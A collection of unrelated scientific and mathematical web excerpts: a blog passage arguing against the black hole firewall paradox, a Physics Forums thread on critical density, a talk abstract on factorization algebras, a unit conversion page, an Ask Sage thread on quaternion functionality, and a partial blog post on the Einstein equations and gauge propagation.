It also means that the state is an eigenstate of a (complicated) observable at a later time which evolved from $$N_b$$. On the other hand, this observable doesn't commute with $$N_a$$, the occupation number for a field mode moderately inside the black hole, in the $$A$$ region. The state can't be an $$N_b$$ eigenstate and an $$N_a$$ eigenstate at the same moment because they're generically non-commuting operators, and consequently, it can't be true that $$N_a=0$$ which is needed for the emptiness of the old black hole interior from the viewpoint of an infalling observer.
I don't think so. What is true and what is not about Joe's statements above?
First, let us ask: Will her "later" state be an eigenstate of $$N_a$$ or $$N_b$$? Here, the answer is clear. We assumed the state to be an $$N_b=5$$ eigenstate so by the dynamical equations, the state will remain an eigenstate of an observable that evolved from $$N_b$$ via Heisenberg's equations. For this quantity (probably involving an undoable measurement in practice), the measured value is sharply determined.
To predict the value of another quantity such as $$N_a$$, we need to decompose the state into $$N_a$$ eigenstates and the squared absolute values of the probability amplitudes determine the probabilities of different results. Joe is right that in principle, because the operators $$N_a$$, $$N_b$$, and their commutator are "generic", there will inevitably be a nonzero probability for $$N_a\neq 0$$.
However, Joe isn't right when he suggests that this means a problem. Indeed, the probability of $$N_a\neq 0$$ will be nonzero. Nevertheless, this probability may still be tiny. In other words, the probability that a particular mode will be seen as $$N_a=0$$ may still approach 100 percent so in the classical or semiclassical approximation, quantum gravity will continue to respect the equivalence principle which implies that an observer falling into an old black hole sees no radiation (not even the Unruh one which he would see if he were not freely falling).
And I think that this is what happens. The probability of $$N_a\neq 0$$ is tiny but nonzero. We may try to be somewhat more quantitative.
Choose a basis of the $$\exp(S)$$-dimensional space of the black hole microstates so that the basis vectors are $$N_a$$ eigenstates. Now, my point is that the number of $$N_a=0$$ basis vectors can be and almost certainly is greater (and probably much greater) than the number of $$N_a=1$$ or higher eigenvalue eigenstates. We know how it would work if $$N_a$$ were counting the occupation number from a non-freely-falling, "static" observer's viewpoint.
In that case, the probability of having a greater number of particles (by one) would be suppressed by a factor similar to the Boltzmann factor $$\exp(-\beta E_n)$$ where $$E_n$$ is the energy of the mode and $$\beta$$ is the inverse black hole temperature, comparable to the Schwarzschild radius. In that case, we could prove that the probability of having a higher number of particles (by one) in some spherical harmonic $$Y_{LM}$$ would be suppressed by something like $$e^L$$; I am a bit sketchy here. This is just a description of the Unruh radiation that a "static" observer would experience right outside the black hole.
Things are harder for the freely infalling observer. Classically, she shouldn't see any radiation – because of the equivalence principle – so the higher values of $$N_a$$ should be even more suppressed. The suppression should become "total" for macroscopic black holes.
At the same time, however, the working of the low-energy effective field theory means that in the relevant Hilbert space, the creation operator increasing $$N_a$$ must relate states pretty much in a one-to-one fashion. So how could it be true that the number of $$N_a=1$$ eigenstates in the basis is (much) lower than the number of the $$N_a=0$$ eigenstates?
Before you conclude that my scenario is shown mathematically impossible, don't forget about one thing. If you create a quantum in a quantum field (in the black hole interior) and increase $$N_a$$, you also change the total mass/energy of the black hole from $$M$$ to $$M+E_a$$. So the $$N_a=0$$ states of a lighter black hole are in one-to-one correspondence with the $$N_a=1$$ states of a heavier black hole.
In other words (or using an annihilation operator), the $$N_a=1$$ states of the black hole of a given mass are in one-to-one correspondence with the $$N_a=0$$ states of a lighter black hole whose mass is $$M-E_a$$. But a smaller black hole has a smaller entropy, and therefore a smaller total number of all microstates. The ratio of the number of states is approximately equal to$\frac{ \exp(S_{\rm larger})} {\exp(S_{\rm smaller})} \sim \frac{\exp(M^2)}{\exp[(M-E_a)^2]}\sim\exp(2ME_a G)$ where I restored Newton's constant in the final result. All purely numerical factors are ignored. This result is still the quasi-Boltzmannian $$\exp(C\beta E_a)$$ with some unknown numerical constant $$C$$. Well, the calculation was really more appropriate for a static observer but even for a freely infalling one, it should still be true that the action of a creation operator creates a larger and heavier black hole. In other words, the annihilation operators produce a lighter black hole with fewer states, and therefore the excited states are in one-to-one correspondence with the smaller number of states of a lighter black hole.
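The approximation in the last displayed formula is easy to sanity-check numerically. With the toy assumption $S(M) = M^2$ in units where $G = 1$ (my choice, not the post's), the exact entropy ratio differs from the quasi-Boltzmannian estimate only at order $E_a^2$:

```python
import math

# Toy check: with S(M) = M^2 (units where G = 1), the state-count ratio
# exp(S(M)) / exp(S(M - E)) = exp(2*M*E - E^2) ~ exp(2*M*E) for E << M.
M, E = 10.0, 1e-3
exact = math.exp(M ** 2 - (M - E) ** 2)
estimate = math.exp(2 * M * E)
print(exact / estimate)  # exp(-E^2): equal to 1 up to roughly 1e-6 here
```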
Even if the calculation above is wrong despite the tolerance for errors in the numerical factors (if the parametric dependence is different, and I hope it is), I think it's true that a fixed-mass black hole has fewer eigenstates with $$N_a=1$$ than those with $$N_a=0$$, so it's more likely that we will see empty modes. This likelihood is becoming overwhelming for modes that are sufficiently localized on the event horizon (those proportional to $$Y_{LM}$$ with a larger $$L$$). It means that if you pick a generic state such as the $$N_b=5$$ eigenstate and decompose it to the $$N_a$$ eigenstate basis, most of the terms will still correspond to $$N_a=0$$ which means that there will be a near-certainty that you will measure $$N_a=0$$ even though $$N_a,N_b$$ refuse to commute.
The fact that $$N_a\neq 0$$ may happen shouldn't be shocking. Look at a younger black hole and you will see that the interior can't be quite empty. It takes $${\mathcal O}(r_s)$$ of proper time to suck "most of the material" of the star from which the black hole was created but because some of the material recoils etc., there's a nonzero amount of material inside the black hole at later times, too.
Joe neglects the fact that $$N_a=0$$ is only an approximately valid statement and uses the strict $$N_a=0$$ to derive a paradox. I think that $$N_a=0$$ is just approximate and in fact, it's an interesting challenge to use the laws of quantum gravity – or specific laws in a formulation of string theory – to derive the percentage of states that have $$N_a=1$$, for example. Classically, almost all microstates must correspond to an empty interior (as seen by an infalling observer) because the highest-entropy, dominant microstates are those that (because of the second law of thermodynamics) appear "later" once the black hole is sufficiently stabilized, almost perfectly spherical, and after it has consumed the star material and its echoes. The reason behind $$N_a\approx 0$$ is therefore "entropic".
I don't know what the exact parametric dependence is so most of the formulae above were just "proofs of a concept" but I do think it shows that Polchinski et al. have overlooked a loophole that is arguably more plausible than all the loopholes they have discussed. The loophole says that the emptiness of the black hole interior simply isn't perfect but it is very good for large black holes and localized modes (certainly no deadly firewalls!). The equivalence principle at long distance scales, unitarity, and other assumptions of quantum mechanics and low-energy effective field theory may be preserved when complementarity is allowed to do its job and declare the information inside and outside the black hole as "not quite independent information".
And that's the memo.
|
|
## Intermediate Algebra (6th Edition)
$x=-1$ This is not a function. This is a vertical line passing through (-1,0). This graph fails the vertical line test.
|
|
Critical density: question correction
1. Jul 23, 2015
Luminescent
Hope I'm in the right section for this question! In the big bang model, the expansion of the universe is slowed down by gravity. If there is enough matter in the universe, then the expansion can be overcome and the universe will collapse in the future. The density of matter that is just sufficient to eventually halt the expansion is called the critical density. The equation for the critical density is
ρcrit = 3H₀² / (8πG)
You can see that the critical density is proportional to the square of the Hubble constant — a faster expansion requires a higher density to overcome the expansion.
We can calculate ρcrit by inserting the gravitational constant, G = 6.67 × 10⁻¹¹ N·m²/kg², and adopting H₀ = 70 km/s/Mpc. We first convert the Hubble constant to metric units, H₀ ≈ 2.1 × 10⁻¹⁸ s⁻¹. Now we can solve to get ρcrit = 3 × (2.1 × 10⁻¹⁸)² / (8 × 3.14 × 6.7 × 10⁻¹¹) = 7.9 × 10⁻²⁷ kg/m³ ≈ 10⁻²⁶ kg/m³, equal to about five hydrogen atoms per cubic meter.
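For what it's worth, the arithmetic above is easy to reproduce; the constants below are standard values assumed here (the post's rounded Hubble constant gives 7.9 × 10⁻²⁷, while the unrounded conversion gives closer to 9.2 × 10⁻²⁷ kg/m³):

```python
import math

# Constants assumed here (not from the post): G in SI units, one megaparsec in metres.
G = 6.674e-11            # m^3 kg^-1 s^-2
Mpc = 3.0857e22          # m
H0 = 70.0 * 1000 / Mpc   # 70 km/s/Mpc in s^-1, about 2.27e-18
rho_crit = 3 * H0 ** 2 / (8 * math.pi * G)
print(rho_crit)          # about 9.2e-27 kg/m^3, i.e. a few hydrogen atoms per m^3
```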
With all that being said, can anyone tell me why;
Why 8π × G? Or why 3 × H²?
In other words, I'm looking for an explanation as to why we are using particular numbers like 8π or 3H² to achieve density?
Last edited: Jul 23, 2015
2. Jul 23, 2015
RyanH42
From the equations which describe the universe.
Do you know the Friedmann equation?
$H^2 - \frac{8\pi G\rho}{3} = -\frac{k}{a^2(t)} + \frac{\Lambda c^2}{3}$
If we assume $k=0$ (which it is) and $\Lambda=0$ (we assume $\Lambda=0$ for simplicity) then we get
$H^2 = \frac{8\pi G\rho}{3}$
and then $\rho = \frac{3H^2}{8\pi G}$.
These numbers are derived from the equations which describe the universe: the Einstein field equations give us the Friedmann equation, and the Friedmann equation gives us the critical density equation.
3. Jul 23, 2015
Luminescent
Yes, thank you for your reply, I am aware of these calculations. My question can even be related to them if preferred. The question still stands: how are the values 8π and 3 relevant to the equation's parameters? They are acting as constants in themselves, but for what purpose? Where is the dimensionality in 8π, other than to say it undergoes 4 rotations? Relatively so, what is the dimensionality of 3? In other words, what are they explaining in the equation?
4. Jul 23, 2015
Luminescent
I meant to tag you for a response. Here we go
5. Jul 23, 2015
Staff: Mentor
Note that this is only true if the cosmological constant is zero. If it's positive (which, according to our best current model, it is), a critical density universe will still expand forever. In fact, according to our best current model, our universe is at the critical density (if the density of dark energy, i.e., the cosmological constant, is included), and will expand forever.
We're not. We're using them because they are needed to make the equations match reality.
These are dimensionless numbers; they're not there to correct the units of anything. They're there because they have to be there to make the equations match reality.
I'm not sure what you mean. The equation is supposed to describe reality, i.e., to describe the relationship between density and expansion rate (among other things) that we actually observe. But without the $8 \pi$ and the $3$ in there, the equation doesn't correctly describe that relationship.
6. Jul 23, 2015
RyanH42
The derivation of Friedmann equation:
$1/2mV^2-mMG/r=U$
$V^2-2MG/r=2U/m$
$M = \frac{4}{3}\pi\rho R^3$ and $V = HR$, so
$H^2 R^2 - \frac{8\pi G\rho R^2}{3} = -k$
$H^2 - \frac{8\pi G\rho}{3} = -\frac{k}{R^2}$
$k = -\frac{2U}{m}$, where $U$ is the total energy.
This derivation is wrong, but it can give you an idea of where the 8, π, G, and 3 come from.
Or let's think the other way: $\rho = \frac{3H^2}{8\pi G}$, so
$\frac{8\pi G}{3} = \frac{H^2}{\rho}$
So these numbers are just constants that make $\frac{H^2}{\rho}$ the same for all time ($H$ and $\rho$ are time dependent).
7. Jul 23, 2015
Luminescent
Thanks for your replies, these are all great answers! Bear with me, I'm still at high school level.
Very interesting, though!
Is there any other way physicists can derive critical density without it being derived from the Friedman equations?
Seems to me there must logically be another way to calculate the density of the universe and arrive at the same value and units...
8. Jul 23, 2015
Staff: Mentor
No.
The actual density of the universe is not the same, conceptually, as the critical density. The actual density is whatever we measure it to be. The critical density is a theoretical quantity that is calculated from the Friedmann equations. Our best measurements indicate that, to within experimental error, the two are numerically the same, but that doesn't make them the same thing. It just means they happen to be equal numerically.
9. Jul 23, 2015
Luminescent
Ahh yes, well noted. Interesting though... Their numerical similarity describes what, then? If their separateness lies in their description, then there must be some sort of error in our collective methods and descriptions of such mechanics... Wouldn't you agree?
10. Jul 23, 2015
Staff: Mentor
Um, that the actual density of the universe is the same as the theoretically calculated critical density? I'm not sure what you're trying to ask here.
I don't know because I don't understand what you're asking.
|
|
PIRSA:23020054
# Classical Bulk-Boundary Correspondences via Factorization Algebras
### APA
Rabinovich, E. (2023). Classical Bulk-Boundary Correspondences via Factorization Algebras. Perimeter Institute. https://pirsa.org/23020054
### MLA
Rabinovich, Eugene. Classical Bulk-Boundary Correspondences via Factorization Algebras. Perimeter Institute, Feb. 17, 2023, https://pirsa.org/23020054
### BibTex
@misc{ pirsa_23020054,
doi = {10.48660/23020054},
url = {https://pirsa.org/23020054},
author = {Rabinovich, Eugene},
keywords = {Mathematical physics},
language = {en},
title = {Classical Bulk-Boundary Correspondences via Factorization Algebras},
publisher = {Perimeter Institute},
year = {2023},
month = {feb},
note = {PIRSA:23020054 see, \url{https://pirsa.org}}
}
## Abstract
A factorization algebra is a cosheaf-like local-to-global object which is meant to model the structure present in the observables of classical and quantum field theories. In the Batalin-Vilkovisky (BV) formalism, one finds that a factorization algebra of classical observables possesses, in addition to its factorization-algebraic structure, a compatible Poisson bracket of cohomological degree +1. Given a "sufficiently nice" such factorization algebra on a manifold $N$, one may associate to it a factorization algebra on $N\times \mathbb{R}_{\geq 0}$. The aim of the talk is to explain the sense in which the latter factorization algebra "knows all the classical data" of the former. This is the bulk-boundary correspondence of the title. Time permitting, we will describe how such a correspondence appears in the deformation quantization of Poisson manifolds.
|
|
# 94 knots in meters per second
## Conversion
94 knots is equivalent to 48.3577777777778 meters per second.[1]
## Conversion in the opposite direction
The inverse of the conversion factor is that 1 meter per second is equal to 0.0206791967280915 times 94 knots.
It can also be expressed as: 94 knots is equal to $\frac{1}{\mathrm{0.0206791967280915}}$ meters per second.
## Approximation
An approximate numerical result would be: ninety-four knots is about forty-eight point three five meters per second, or alternatively, a meter per second is about zero point zero two times ninety-four knots.
## Footnotes
[1] The precision is 15 significant digits (fourteen digits to the right of the decimal point).
Results may contain small errors due to the use of floating point arithmetic.
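The conversion can be checked from the exact definition of the knot (one nautical mile, exactly 1852 m, per hour):

```python
# One knot is exactly 1852 m per hour, so 1 kn = 1852/3600 m/s.
knots = 94
mps = knots * 1852 / 3600
print(mps)      # ≈ 48.3578 m/s, matching the conversion above
print(1 / mps)  # ≈ 0.0206792, matching the inverse factor (per knot of the 94)
```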
|
|
# Quaternions Missing Important Functionality?
I use quaternions and Clifford algebras frequently for solving PDE boundary value problems as well as things like reflections, rotations etc. The underlying field for my quaternions is almost always either the complex numbers or the symbolic ring.
I am making an attempt to use them in Sage but I've run into a couple of obstacles that have given me pause. The absolute first things I looked for were,
1) scalar part or real part of the quaternion. Where is this function? I stumbled upon turning it into a list or vector but I presume that just taking the scalar part would be more efficient than dumping all the coefficients. For matrix representations it's often just the trace of the matrix. Correspondingly obtaining the vector part should be a standard function as well.
2) Quaternion automorphisms and anti-automorphisms? Where are they? Yes, we have conjugate, which is both a method and an external function, but what about the reversion and involution and the many other automorphisms? I don't expect to have to multiply by a bunch of unit vectors to get them, for efficiency reasons. Also, how do I distinguish between the quaternion conjugate and the complex conjugate of each of its elements? This is a very important distinction that I would not know how to do without stripping out its components and then remapping it.
3) Constructing a quaternion from coefficients. The only examples I've seen require explicit multiplications like q = q0 + q1 * i + q2 * j + q3 * k . That doesn't seem efficient.
4) quaternions as elements of enclosing matrices and vectors. This would be very helpful since you could generate any Clifford algebra with this and it's often easier to analyze the components of said algebra that are isomorphic to Quaternions or Biquaternions in the complex case. Moreover I need to be able to do this for quaternions over the symbolic ring. It fails for me as this example from sage 7.3 shows:
Q.<e1,e2,e3> = QuaternionAlgebra(SR, -1,-1)
var('x y z', domain='real')
q1 = x + x * I * e1
q2 = x - x * I * e1
v = vector([q1,q2])
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "sage/modules/free_module_element.pyx", line 510, in sage.modules.free_module_element.vector
TypeError: unsupported operand type(s) for ** or pow(): 'QuaternionAlgebra_ab' and 'int'
5) quaternion rotations. Most libraries will generate the unit quaternion that rotates in 3D space and/or have a function that applies it efficiently.
There are probably a few other things like generating a canonical matrix ...
I just want to say this is a really great and well-thought-out question, and I hope someone answers it soon. My guess is that at least some of this really would need new tickets; quaternion stuff in Sage I think is more there for algebraists than e.g. graphics.
(2016-08-26 06:40:36 -0500)
I agree that many quaternion functionalities are missing. Here is simply the answer to the point 3) you have raised: a quaternion can be constructed directly from its coefficients by means of SageMath's standard element instantiation from the parent, i.e. H(...) where H is the quaternion algebra:
sage: H.<i,j,k> = QuaternionAlgebra(SR, -1, -1)
sage: var("t x y z", domain='real')
(t, x, y, z)
sage: q = H((t, x, y, z)); q
t + x*i + y*j + z*k
sage: q.conjugate()
t + (-x)*i + (-y)*j + (-z)*k
sage: q2 = H((2, 0, -3*x^2, 4)); q2
2 + (-3*x^2)*j + 4*k
sage: q2.conjugate()
2 + 3*x^2*j + (-4)*k
The reverse operation is provided by the method coefficient_tuple:
sage: q.coefficient_tuple()
(t, x, y, z)
sage: q2.coefficient_tuple()
(2, 0, -3*x^2, 4)
After hacking away at this for a day or so, I can start answering some of my own questions. One reason why I didn't have answers right away is due to the fact that the automatically generated documentation for the quaternions does not cover the methods in the parent class nor does it cover several external functions that still work against the quaternion object.
The other problem is that I am not an algebraist. So for example the fact that the scalar part is actually half the reduced trace was not readily obvious. So here is my take so far on my "issues".
1) Let q be an instance of a quaternion. q.reduced_trace()/2 is the scalar part. But even better is the undocumented fact that the [] operator has been overloaded so that you can simply do q[0]. The latter is a nice feature. Once you have that, generating the "vector part" is easy enough.
2) Another undocumented feature is the .C method for matrices and the .conjugate() method, which appears to exist for both quaternions and matrices. However, it only gives you the quaternion conjugation, not the elementwise complex conjugation. The latter has to be added by the programmer as far as I can tell.
As for the other automorphisms like involution and reversion, they would have to be implemented by the programmer as far as I can tell. I suspect the same might be true for the more general Clifford algebras, but I'm not certain.
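On the conjugation ambiguity in point 2): since `coefficient_tuple` and reconstruction via `H(...)` both work (per the accepted answer above), an elementwise complex conjugation can be pieced together in a few lines. This is an untested sketch and the helper name is mine:

```
sage: H.<i,j,k> = QuaternionAlgebra(SR, -1, -1)
sage: def complex_conjugate(q):
....:     # conjugate each SR coefficient; contrast with q.conjugate(),
....:     # which instead flips the signs of the i, j, k parts
....:     return H(tuple(c.conjugate() for c in q.coefficient_tuple()))
```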
3) I'm stuck with this for now. Maybe there are undocumented constructors somewhere.
4) Well, quaternions cannot be elements of a vector, but they can be elements of a matrix! Whoo hoo! Something like
mat12 = matrix([q1,q2])
will actually create a row matrix from two quaternions. Now I can implement the direct sum of two biquaternions, which is the odd degenerate space I have to work with. I guess someone forgot or didn't see the need to implement a _vector_ method.
5) As for rotations, I guess we are on our own here. You will have to implement that yourself, as well as slerp and so forth for the computer graphics guys. I guess reflections or Lorentz transformations and so forth, which are nicely expressed in quaternions, would also have to be a user application for now, along with wedge products, inner products and all the other types of multiplication in geometric algebras/Clifford algebras.
I have accumulated a few more complaints though as I have continued. First it appears that there is not a lot of support for global substitutions on symbolic quaternions. You can't define quaternion functions symbolically and you can't do global variable substitutions without directly accessing the components. Global differentiation also appears broken.
Another gaping hole for any serious use of these libraries is the complete absence of quaternion transcendental functions. First there is no inverse! Yup quaternion inverse is missing. There is no exponentiation, no logarithm, no powers ...
I have run into another major problem with the quaternion package. You can not create functions that map variables to quaternions nor can you do global substitutions of variables. Here is an example, e1 is a quaternion.
~~~~
var('x y', domain='real')
Q.<e1,e2,e3> = QuaternionAlgebra(SR, -1,-1)
q1 = I * x - x * e1
print (q1.subs(x=y))
qfunc(x) = I * x + x * e1
print(qfunc(y))
print(q1[0].subs(x=y))
~~~~
With output:
~~~~
I*x + (-x)*e1
I*x + x*e1
I*y
~~~~
As you can see, only when I extract a coefficient of the quaternion do I get what I expect from a simple substitution.
(2016-08-26 16:13:11 -0500)
|
|
# Given vectors u=<4,1> & v=<1,3>, how would I determine the quantity 3u*-2v?
$\langle 10, -9 \rangle$
By $u\ast$ I assume we mean $\bar{u}$, i.e. the complex conjugate of the vector $u$ (treating $\langle 4, 1 \rangle$ as $4 + i$).
In this case, $3\bar{u} - 2v = 3\langle 4, -1 \rangle - 2\langle 1, 3 \rangle$
$= \langle 12, -3 \rangle - \langle 2, 6 \rangle = \langle 10, -9 \rangle$
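The arithmetic, under the answer's conjugate reading of $u\ast$, in a couple of lines:

```python
# Following the answer's reading of u* as the conjugate (4, -1):
u_conj = (4, -1)
v = (1, 3)
result = tuple(3 * a - 2 * b for a, b in zip(u_conj, v))
print(result)  # (10, -9)
```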
|
|
# Ngô Quốc Anh
## December 10, 2012
### Construction of spacetimes via solutions of the vacuum Einstein constraint equations and the propagation of the gauge condition
Filed under: Riemannian geometry — Tags: — Ngô Quốc Anh @ 23:10
A couple of days ago, we showed that the Einstein equations are essentially hyperbolic under the harmonic gauge. To be precise, the solvability of the equations
$\displaystyle {\overline {{\text{Ric}}}} - \frac{1}{2}\overline g \text{Scal}_{\overline g} +\Lambda \overline g = \kappa\overline T,$
is equivalent to solving the following hyperbolic system
$\displaystyle - \frac{1}{2}{\overline g ^{km}}{\overline g _{ij,km}} = \Psi_{ij}((\overline g_{pq})_{0\leqslant p,q \leqslant n},(\overline g_{pq,r})_{0\leqslant p,q,r \leqslant n}),$
provided $\displaystyle {\lambda ^\alpha } = 0$ for all $\alpha = \overline {0,n}$. Later on, when we consider the Cauchy problem for the Einstein equations on some appropriate framework, the first and second fundamental forms need to verify some constraint equations, [here and here].
By tracing the above equation, we obtain
$\displaystyle \text{Scal}_{\overline g} + \frac{2n}{2 - n}\Lambda = \frac{2\kappa}{2 - n}\text{trace}_{\overline g}(\overline T),$
which helps us to write
$\displaystyle\overline {{\text{Ric}}} = \kappa \left( {\overline T - \frac{\overline g}{{n - 2}}{\text{trace}}_{\overline g}(\overline T )} \right) + \frac{2}{{n - 2}}\Lambda \overline g.$
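Spelling out the substitution behind the last display: rearrange the Einstein equation as $\overline{\text{Ric}} = \kappa \overline T + \frac{1}{2}\overline g\,\text{Scal}_{\overline g} - \Lambda\overline g$ and insert the traced scalar curvature:

```latex
\overline{\mathrm{Ric}}
  = \kappa \overline T
    + \frac{\overline g}{2 - n}\Bigl( \kappa\, \mathrm{trace}_{\overline g}(\overline T) - n \Lambda \Bigr)
    - \Lambda \overline g
  = \kappa \Bigl( \overline T - \frac{\overline g}{n - 2}\, \mathrm{trace}_{\overline g}(\overline T) \Bigr)
    + \frac{2}{n - 2} \Lambda \overline g .
```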
In the vacuum case, the above equation is nothing but
$\displaystyle {\overline {{\text{Ric}}}}=\frac{2}{{n - 2}}\Lambda \overline g.$
The spacetime $V$ we choose will be the product $M \times [0,+\infty)$. What we really need is to construct a metric $\overline g$ on $V$ such that the Einstein equations are fulfilled. In fact, thanks to the hyperbolic system shown above, we aim to find a suitable initial condition such that
• The gauge condition can propagate in time;
• The hyperbolic system is solvable for small time $t$.
While the latter is standard (we shall touch on this issue later), the former needs some study, and this is the main point of this note.
In this entry, given a solution $(g,K)$ of the constraint equations on a manifold $(M,g)$ of the dimension $n$, we shall construct an appropriate spacetime $(V,\overline g)$ of the dimension $n+1$. Recall that
$\displaystyle\begin{array}{lcl} {\overline {{\text{Ric}}} _{ij}} + \frac{1}{2}({{\overline g}_{\alpha i}}\lambda _{,j}^\alpha + {{\overline g}_{\alpha j}}\lambda _{,i}^\alpha ) &=&- \frac{1}{2}{{\overline g}^{km}}{{\overline g}_{ij,km}} + {\text{lower order terms}} \hfill \\&=& \kappa \left( {{{\overline T}_{ij}} - \frac{1}{{n - 2}}{\text{trac}}{{\text{e}}_{\overline g}}(\overline T){{\overline g}_{ij}}} \right) + \frac{2}{{n - 2}}\Lambda {{\overline g}_{ij}} + \frac{1}{2}({{\overline g}_{\alpha i}}\lambda _{,j}^\alpha + {{\overline g}_{\alpha j}}\lambda _{,i}^\alpha ). \end{array}$
Initially, we set
$\displaystyle\begin{gathered} {\overline g _{ij}} \;\,= {g_{ij}},1 \leqslant i,j \leqslant n, \hfill \\ {\overline g _{00}} \,\,= - 1, \hfill \\ {\overline g _{0j}} \,\,= 0,1 \leqslant j \leqslant n, \hfill \\ {\overline g _{ij,0}} = - 2{K_{ij}},1 \leqslant i,j \leqslant n. \hfill \\ \end{gathered}$
As a consequence of the choices above, the spatial derivatives $\overline g _{ij,k}$ with $1 \leqslant i,j,k \leqslant n$ are also determined. To fully construct the initial data, we still need to find the time derivatives $\overline g_{0\alpha,0}$, $0 \leqslant \alpha \leqslant n$.
First, in view of the gauge condition, $\displaystyle {\lambda ^\alpha } = {\square _{\overline g }}{x^\alpha } =0$, we find that
$\displaystyle {\lambda ^\alpha } = \frac{1}{{\sqrt {\det \overline g } }}{(\sqrt {\det \overline g } \,{\overline g ^{ij}}x_{,i}^\alpha )_{,j}} = \overline g _{,j}^{\alpha j} + \frac{1}{2}{\overline g ^{\alpha j}}{\overline g ^{pq}}{\overline g _{pq,j}} = 0.$
Therefore, at $t=0$, we get that
$\displaystyle\begin{gathered} {\lambda ^0} = \overline g _{,0}^{00} + \frac{1}{2}{\overline g ^{00}}{\overline g ^{pq}}{\overline g _{pq,0}}, \hfill \\ {\lambda ^\alpha } = \overline g _{,0}^{\alpha 0} + \underbrace {\sum\limits_{j = 1}^n {\left( {\overline g _{,j}^{\alpha j} + \frac{1}{2}{{\overline g }^{\alpha j}}{{\overline g }^{pq}}{{\overline g }_{pq,j}}} \right)} }_{\text{already determined}},1 \leqslant \alpha \leqslant n. \hfill \\ \end{gathered}$
Hence, in order to guarantee that $\lambda^\alpha \equiv 0$ at $t=0$ for all $\alpha=\overline{0,n}$, we first select $\overline g _{,0}^{\alpha 0}$ such that $\lambda^\alpha =0$ at $t=0$. Once this task is done, we can determine $\overline g _{,0}^{00}$ at $t=0$ such that $\lambda^0=0$ at $t=0$.
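To make the second step concrete, take the sum over $p,q$ in $\lambda^0$ to run over the spatial indices $1,\dots,n$ (the convention suggested by the initial data above), and insert $\overline g^{00} = -1$, $\overline g^{pq} = g^{pq}$ and $\overline g_{pq,0} = -2K_{pq}$ at $t=0$:

$\displaystyle {\lambda ^0} = \overline g _{,0}^{00} + \frac{1}{2}( - 1)\,{g^{pq}}( - 2{K_{pq}}) = \overline g _{,0}^{00} + {\text{trace}}_g K,$

so $\lambda^0 = 0$ at $t=0$ forces $\overline g _{,0}^{00} = -{\text{trace}}_g K$.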
In other words, the initial data that preserves the gauge condition can be found in this way. Within a small time, the hyperbolic system mentioned above always admits a solution $\overline g$; that is to say, the reduced Einstein equations have a solution, i.e.,
$\displaystyle \mathop{\overline {\text{Ric}}}\limits_{(h)}{}^{ij}=\kappa \left( {{{\overline T}^{ij}} - \frac{1}{{n - 2}}{\text{trace}}_{\overline g}(\overline T){{\overline g}^{ij}}} \right)+\frac{2}{{n - 2}}\Lambda \overline g^{ij},$
where the $(0,2)$-tensor $\mathop{\overline {\text{Ric}}}\limits_{(h)}$ is given by
$\displaystyle\mathop{\overline {\text{Ric}}}\limits_{(h)}{}_{ij}={\overline {{\text{Ric}}} _{ij}} + \frac{1}{2}({\overline g _{\alpha i}}\lambda _{,j}^\alpha + {\overline g _{\alpha j}}\lambda _{,i}^\alpha ).$
However, $\overline g$ need not solve the full Einstein equations unless the gauge condition remains valid within that small time. We shall prove that it does.
We now consider how the gauge condition propagates in time as long as the metric $\overline g$ solves the reduced equations. As we shall see, each $\lambda^\alpha$ satisfies a homogeneous linear wave equation, a consequence of the Bianchi identities, with vanishing initial time derivatives coming from the constraint equations.
First, since the metric $\overline g$ solves
$\displaystyle - \frac{1}{2}{{\overline g}^{km}}{{\overline g}_{ij,km}} + {\text{lower order terms}} = \kappa \left( {{{\overline T}_{ij}} - \frac{1}{{n - 2}}{\text{trace}}_{\overline g}(\overline T){{\overline g}_{ij}}} \right)$
and thanks to the Einstein equation for the $\text{Ric}$ curvature, we immediately have
$\displaystyle {\overline {{\text{Ric}}} _{ij}} + \frac{1}{2}({{\overline g}_{\alpha i}}\lambda _{,j}^\alpha + {{\overline g}_{\alpha j}}\lambda _{,i}^\alpha ) = \frac{2}{{n - 2}}\Lambda {{\overline g}_{ij}}.$
Let us write
$\displaystyle {L_{\alpha \beta }} = \frac{1}{2}{\overline g _{\beta \mu }}{\partial _\alpha }{\lambda ^\mu } + \frac{1}{2}{\overline g _{\alpha \mu }}{\partial _\beta }{\lambda ^\mu }-\frac{2}{{n - 2}}\Lambda {{\overline g}_{\alpha \beta}}.$
Using this, we have
$\displaystyle {\overline {{\text{Ric}}} ^{\alpha \beta }} - \frac{1}{2}{\overline g ^{\alpha \beta }}\text{Scal}_{\overline g} = - ({L^{\alpha \beta }} - \frac{1}{2}{\overline g ^{\alpha \beta }}L),$
where $L$ is the trace of $L^{\alpha\beta}$. Since the Einstein tensor is divergence free, we obtain
$\displaystyle {\nabla _\lambda }({L^{\lambda \mu }} - \frac{1}{2}{\overline g ^{\lambda \mu }}L) = 0.$
Keep in mind that $\nabla _\lambda \overline g=0$. A simple calculation shows that
$\displaystyle\begin{gathered} 0 = {\nabla _\lambda }({\overline g ^{\alpha \lambda }}{\overline g ^{\beta \mu }}{L_{\alpha \beta }} - \frac{1}{2}{\overline g ^{\lambda \mu }}{\overline g ^{\alpha \beta }}{L_{\alpha \beta }}) \hfill \\ \,\,\,\,= \frac{1}{2}{\nabla _\lambda } \Big({\overline g ^{\alpha \lambda }}{\overline g ^{\beta \mu }}({\overline g _{\beta \mu }}{\partial _\alpha }{\lambda ^\mu } + {\overline g _{\alpha \mu }}{\partial _\beta }{\lambda ^\mu }) - \frac{1}{2}{\overline g ^{\lambda \mu }}{\overline g ^{\alpha \beta }}({\overline g _{\beta \mu }}{\partial _\alpha }{\lambda ^\mu } + {\overline g _{\alpha \mu }}{\partial _\beta }{\lambda ^\mu }) \Big) \hfill \\ \,\,\,\,= \frac{1}{2}{\overline g ^{\alpha \lambda }}\underbrace {{{\overline g }^{\beta \mu }}{{\overline g }_{\beta \mu }}}_1{\nabla _\lambda }({\partial _\alpha }{\lambda ^\mu }) + \frac{1}{2}{\overline g ^{\beta \mu }}\underbrace {{{\overline g }^{\alpha \lambda }}{g_{\alpha \mu }}}_{\delta _\mu ^\lambda }{\nabla _\lambda }({\partial _\beta }{\lambda ^\mu }) \hfill \\ \qquad- \frac{1}{4}{\overline g ^{\lambda \mu }}\underbrace {{{\overline g }^{\alpha \beta }}{{\overline g }_{\beta \mu }}}_{\delta _\mu ^\alpha }{\nabla _\lambda }({\partial _\alpha }{\lambda ^\mu }) - \frac{1}{4}{\overline g ^{\lambda \mu }}\underbrace {{{\overline g }^{\alpha \beta }}{{\overline g }_{\alpha \mu }}}_{\delta _\mu ^\beta }{\nabla _\lambda }({\partial _\beta }{\lambda ^\mu }) \hfill \\ \,\,\,\,= 